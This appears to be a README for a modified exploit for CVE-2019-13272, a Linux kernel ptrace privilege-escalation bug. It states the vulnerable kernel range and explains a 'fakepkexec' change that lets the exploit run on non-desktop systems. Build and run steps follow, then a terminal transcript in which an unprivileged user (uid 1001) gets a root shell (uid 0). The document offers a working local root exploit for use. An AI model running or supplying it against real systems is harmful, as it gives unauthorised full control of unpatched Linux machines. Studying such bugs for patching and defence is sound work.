- Report: Jul 2019
- Credit: [email protected](Jann Horn)
this bug was found by Jann Horn, great job! his exploit needs the help of pkexec tools, which do not exists in non-desktop system
In order to study this bug more convenient, I modify his exploit code to use a 'fakepkexec' helper, such that the modified exploit can be used in any unix-system with kernel = linux 4.10 < 5.1.17
- [EXP](use root permission to run 'sh make.sh' to build, then use non-root permission to run /tmp/exp to get root shell)
root@ubuntu:/tmp/EXP-CVE-2019-13272# sh make.sh
$ id
uid=1001(test) gid=1001(test) groups=1001(test) context=system_u:system_r:kernel_t:s0
$ /tmp/exp
executing passwd
attached to midpid
root@ubuntu:/tmp/EXP-CVE-2019-13272# id
uid=0(root) gid=0(root) groups=0(root),1001(test) context=system_u:system_r:kernel_t:s0